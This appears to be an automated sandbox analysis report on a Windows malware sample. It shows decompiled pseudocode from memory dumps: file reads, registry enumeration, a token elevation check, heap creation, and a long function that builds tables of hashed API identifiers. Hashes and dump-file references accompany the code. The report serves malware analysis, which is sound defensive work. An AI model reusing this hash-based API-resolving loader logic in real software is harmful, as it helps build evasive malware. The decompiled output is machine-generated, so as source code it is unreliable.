Instruction ID: bc47bee747f020609612be460a99d1bb85b074856f20bab275ae58b474c34e85
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: 8EF04931A1AB7179D75159B8AC41B9B7BE8DFD1750F304F2AF540A6144EB60C4808268

Uniqueness

Uniqueness Score: -1.00%

Function 6EB35E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EB35E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6EB2C280(_t19) == 0) {
					_v12 = _a8;
					if(E6EB33064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6EB335F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6eb35e87
0x6eb35e89
0x6eb35e95
0x6eb35e9f
0x6eb35eb5
0x6eb35ed4
0x6eb35eb7
0x6eb35ec8
0x6eb35ecc
0x6eb35eec
0x6eb35ece
0x6eb35ece
0x6eb35ece
0x6eb35ecc
0x6eb35ed5
0x6eb35eda
0x6eb35ee3
0x6eb35edc
0x6eb35edc
0x6eb35ede
0x6eb35ede
0x6eb35e97
0x6eb35e97
0x6eb35e97
0x6eb35ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6EB35D79,00000000,?,00000000,?), ref: 6EB35EC8

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: 7d205360f042da5dbe6ad49c950c5026e460228f971ed7009dd5379e967d4435
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: 67F0D631219273EED751DAADEC02AAB7FD8EF45240F204C2BA8A9C2140EA32D444C665

Uniqueness

Uniqueness Score: -1.00%

Function 6EB3564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EB3564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6EB33064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6EB2E644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6eb35656
0x6eb35658
0x6eb3565f
0x6eb35661
0x6eb35665
0x6eb35667
0x6eb3566a
0x6eb3566d
0x6eb3566d
0x6eb35687
0x00000000
0x00000000
0x6eb35698
0x6eb3569c
0x00000000
0x00000000
0x6eb356aa
0x6eb356ad
0x6eb356b2
0x6eb356b7
0x6eb356b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6EB35698

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: c2408f2bc5dc4cc576bd682ddc2a8f265d9349486b7b4dfed1756f2f298a4fb8
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 73F0C8B510131ABFE7259E9ACC54DBBBFFCDBC1B50F11852DA0D542500EA31AC50C970

Uniqueness

Uniqueness Score: -1.00%

Function 6EB31030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6EB31030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6EB3306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6EB3306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6eb3103e
0x6eb31040
0x6eb3104e
0x6eb31052
0x6eb3109b
0x00000000
0x6eb3109b
0x6eb31057
0x6eb31058
0x6eb3105a
0x6eb3105f
0x00000000
0x6eb31078
0x6eb3107c
0x6eb31089
0x6eb3108d
0x00000000
0x00000000
0x00000000
0x6eb31096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6EB31089

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: 1a338e35bab0099246c36676281f9571909898d7f4fdb1f7e48cf54dcfaf1163
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: A3F0C8703446C3ABFA4099B89C26F3F3AEDDBC1610F648838B550CA1A4DF34C8498221

Uniqueness

Uniqueness Score: -1.00%

Function 6EB33628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6EB33628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6eb3d228 == 0xa33c83e5) {
					_t7 = E6EB33064(0x60a28c5c, 0x1c6ef387);
					 *0x6eb3d22c = E6EB33064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6eb3d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6eb3d228 = 0;
					}
				}
				_t3 = E6EB33064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6eb3d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6eb33630
0x6eb33638
0x6eb3366b
0x6eb3367c
0x6eb33687
0x6eb33692
0x6eb33694
0x6eb33694
0x6eb33687
0x6eb33644
0x6eb3364b
0x00000000
0x6eb3364d
0x6eb3364d
0x6eb3364e
0x6eb33650
0x6eb33652
0x6eb33653
0x00000000
0x6eb33653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6EB2DE09,?,?), ref: 6EB33692

Memory Dump Source

Source File: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Offset: 6EB20000, based on PE: true

Associated: 00000000.00000002.694551720.000000006EB20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694796811.000000006EB3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.694823371.000000006EB3D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.694831298.000000006EB3F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: ca994cea5ad81226c09d99047d3aad6e2288905bd6bd2c32798bd3f172294bd5
Instruction ID: 0e23a91d0ff10ca93868327eb32161c6dbd70d2654e5b48ddf16449da8ef4742
Opcode Fuzzy Hash: ca994cea5ad81226c09d99047d3aad6e2288905bd6bd2c32798bd3f172294bd5
Instruction Fuzzy Hash: D1F0E93416A2F1BDFA6019E6EC0AD57BE98EF55655F300C39F694A5100D6B084C0D635

Uniqueness

Uniqueness Score: -1.00%

Function 0076129E, Relevance: 1.4, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 007613A5

Memory Dump Source

Source File: 00000000.00000002.686308627.0000000000760000.00000040.00000001.sdmp, Offset: 00760000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ace062276d42d08900e6f24e87c0185923075743edc0e6fe2a42c76369fd47d
Instruction ID: fa28fab770d9ce33a01709cce83a13e37018577b8deb47440ea7a6fa9254af95
Opcode Fuzzy Hash: 1ace062276d42d08900e6f24e87c0185923075743edc0e6fe2a42c76369fd47d
Instruction Fuzzy Hash: 7141E4B5E052199FDB04CFA9C4946AEBBF1FF48310F19856DE849AB340D379A840CF95

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EB21494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6EB21494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6EB2F584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v76, E6EB2F4CC( &_v76) + 0x10);
				E6EB2F4BC( &_v80, E6EB2F4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v84, E6EB2F4CC(_t325) + 0x10);
				E6EB2F4BC( &_v88, E6EB2F4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v92, E6EB2F4CC(_t329) + 0x10);
				E6EB2F4BC( &_v96, E6EB2F4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v100, E6EB2F4CC(_t333) + 0x10);
				E6EB2F4BC( &_v104, E6EB2F4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v108, E6EB2F4CC(_t337) + 0x10);
				E6EB2F4BC( &_v112, E6EB2F4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v116, E6EB2F4CC(_t341) + 0x10);
				E6EB2F4BC( &_v120, E6EB2F4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v124, E6EB2F4CC(_t345) + 0x10);
				E6EB2F4BC( &_v128, E6EB2F4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v132, E6EB2F4CC(_t349) + 0x10);
				E6EB2F4BC( &_v136, E6EB2F4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v140, E6EB2F4CC(_t353) + 0x10);
				E6EB2F4BC( &_v144, E6EB2F4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v148, E6EB2F4CC(_t357) + 0x10);
				E6EB2F4BC( &_v152, E6EB2F4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v156, E6EB2F4CC(_t361) + 0x10);
				E6EB2F4BC( &_v160, E6EB2F4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v164, E6EB2F4CC(_t365) + 0x10);
				E6EB2F4BC( &_v168, E6EB2F4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v172, E6EB2F4CC(_t369) + 0x10);
				E6EB2F4BC( &_v176, E6EB2F4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v180, E6EB2F4CC(_t373) + 0x10);
				E6EB2F4BC( &_v184, E6EB2F4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v188, E6EB2F4CC(_t377) + 0x10);
				E6EB2F4BC( &_v192, E6EB2F4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v196, E6EB2F4CC(_t381) + 0x10);
				E6EB2F4BC( &_v200, E6EB2F4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v204, E6EB2F4CC(_t385) + 0x10);
				E6EB2F4BC( &_v208, E6EB2F4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6EB34200(0x60a28c5c, _t434);
				E6EB2F4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6EB2F4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6EB2F4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6EB2F4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6EB2F4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6EB2F4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6EB2F4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6EB2F4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6EB2F4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6EB2F4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6EB2F4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6EB2F4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6EB2F4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6EB2F4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6EB2F4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6EB2F4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6EB2F4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6EB21D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6EB2B27C( &_v248, _v256, _t481, _v252, _t318);
				E6EB2F840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v296, E6EB2F4CC(_t410) + 0x10);
				E6EB2F4BC( &_v300, E6EB2F4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v304, E6EB2F4CC(_t414) + 0x10);
				E6EB2F4BC( &_v308, E6EB2F4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v312, E6EB2F4CC(_t418) + 0x10);
				E6EB2F4BC( &_v316, E6EB2F4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6EB2F828( &_v320, E6EB2F4CC(_t422) + 0x10);
				E6EB2F4BC( &_v324, E6EB2F4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6EB2B9FC(_t154,  *_t480);
				E6EB2F4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6EB2F4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6EB2F4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6EB2F4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6EB2F654( &_v316);
				return E6EB2F654( &_v356);
			}

0x6eb21494
0x6eb21498
0x6eb2149d
0x6eb214a3
0x6eb214ab
0x6eb214b0
0x6eb214bc
0x6eb214c0
0x6eb214d2
0x6eb214e8
0x6eb214f3
0x6eb214f4
0x6eb214f5
0x6eb214f6
0x6eb214f7
0x6eb214fa
0x6eb214fe
0x6eb21502
0x6eb21509
0x6eb2151b
0x6eb21531
0x6eb2153c
0x6eb2153d
0x6eb2153e
0x6eb2153f
0x6eb21540
0x6eb21543
0x6eb21547
0x6eb2154b
0x6eb21552
0x6eb21564
0x6eb2157a
0x6eb21585
0x6eb21586
0x6eb21587
0x6eb21588
0x6eb21589
0x6eb2158c
0x6eb21590
0x6eb21594
0x6eb2159b
0x6eb215ad
0x6eb215c3
0x6eb215ce
0x6eb215cf
0x6eb215d0
0x6eb215d1
0x6eb215d2
0x6eb215d5
0x6eb215d9
0x6eb215dd
0x6eb215e4
0x6eb215f6
0x6eb2160c
0x6eb21617
0x6eb21618
0x6eb21619
0x6eb2161a
0x6eb2161b
0x6eb2161e
0x6eb21622
0x6eb21626
0x6eb2162d
0x6eb2163f
0x6eb21655
0x6eb21660
0x6eb21661
0x6eb21662
0x6eb21663
0x6eb21664
0x6eb21667
0x6eb2166b
0x6eb2166f
0x6eb21676
0x6eb21688
0x6eb2169e
0x6eb216a9
0x6eb216aa
0x6eb216ab
0x6eb216ac
0x6eb216ad
0x6eb216b0
0x6eb216b4
0x6eb216b8
0x6eb216bf
0x6eb216d1
0x6eb216e7
0x6eb216f2
0x6eb216f3
0x6eb216f4
0x6eb216f5
0x6eb216f6
0x6eb216f9
0x6eb216fd
0x6eb21701
0x6eb21708
0x6eb2171a
0x6eb21730
0x6eb2173b
0x6eb2173c
0x6eb2173d
0x6eb2173e
0x6eb2173f
0x6eb21742
0x6eb21746
0x6eb2174a
0x6eb21751
0x6eb21763
0x6eb21779
0x6eb21784
0x6eb21785
0x6eb21786
0x6eb21787
0x6eb21788
0x6eb2178b
0x6eb2178f
0x6eb21793
0x6eb2179a
0x6eb217ac
0x6eb217c2
0x6eb217cd
0x6eb217ce
0x6eb217cf
0x6eb217d0
0x6eb217d1
0x6eb217d4
0x6eb217d8
0x6eb217dc
0x6eb217e3
0x6eb217f5
0x6eb2180b
0x6eb21816
0x6eb21817
0x6eb21818
0x6eb21819
0x6eb2181a
0x6eb2181d
0x6eb21821
0x6eb21825
0x6eb2182c
0x6eb2183e
0x6eb21854
0x6eb2185f
0x6eb21860
0x6eb21861
0x6eb21862
0x6eb21863
0x6eb21866
0x6eb2186a
0x6eb2186e
0x6eb21875
0x6eb21887
0x6eb2189d
0x6eb218a8
0x6eb218a9
0x6eb218aa
0x6eb218ab
0x6eb218ac
0x6eb218af
0x6eb218b3
0x6eb218b7
0x6eb218be
0x6eb218d0
0x6eb218e6
0x6eb218f1
0x6eb218f2
0x6eb218f3
0x6eb218f4
0x6eb218f5
0x6eb218f8
0x6eb218fc
0x6eb21900
0x6eb21907
0x6eb21919
0x6eb2192f
0x6eb2193a
0x6eb2193b
0x6eb2193c
0x6eb2193d
0x6eb2193e
0x6eb21941
0x6eb21945
0x6eb21949
0x6eb21950
0x6eb21962
0x6eb21978
0x6eb21983
0x6eb21984
0x6eb21985
0x6eb21986
0x6eb2198c
0x6eb2198f
0x6eb21991
0x6eb2199c
0x6eb219a3
0x6eb219ac
0x6eb219b4
0x6eb219bb
0x6eb219c4
0x6eb219cc
0x6eb219d3
0x6eb219dc
0x6eb219e4
0x6eb219eb
0x6eb219f4
0x6eb219fc
0x6eb21a03
0x6eb21a0c
0x6eb21a14
0x6eb21a1b
0x6eb21a24
0x6eb21a2c
0x6eb21a36
0x6eb21a3f
0x6eb21a47
0x6eb21a51
0x6eb21a5a
0x6eb21a62
0x6eb21a6c
0x6eb21a75
0x6eb21a7d
0x6eb21a87
0x6eb21a90
0x6eb21a98
0x6eb21aa2
0x6eb21aab
0x6eb21ab3
0x6eb21abd
0x6eb21ac6
0x6eb21ace
0x6eb21ad8
0x6eb21ae1
0x6eb21ae9
0x6eb21af3
0x6eb21afc
0x6eb21b04
0x6eb21b0e
0x6eb21b17
0x6eb21b1f
0x6eb21b26
0x6eb21b2f
0x6eb21b37
0x6eb21b3e
0x6eb21b43
0x6eb21b51
0x6eb21b55
0x6eb21b64
0x6eb21b6d
0x6eb21b72
0x6eb21b79
0x6eb21b7d
0x6eb21b81
0x6eb21b88
0x6eb21b9a
0x6eb21bb0
0x6eb21bbb
0x6eb21bbc
0x6eb21bbd
0x6eb21bbe
0x6eb21bbf
0x6eb21bc2
0x6eb21bc6
0x6eb21bca
0x6eb21bd1
0x6eb21be3
0x6eb21bf9
0x6eb21c04
0x6eb21c05
0x6eb21c06
0x6eb21c07
0x6eb21c08
0x6eb21c0b
0x6eb21c0f
0x6eb21c13
0x6eb21c1a
0x6eb21c2c
0x6eb21c42
0x6eb21c4d
0x6eb21c4e
0x6eb21c4f
0x6eb21c50
0x6eb21c51
0x6eb21c54
0x6eb21c58
0x6eb21c5c
0x6eb21c63
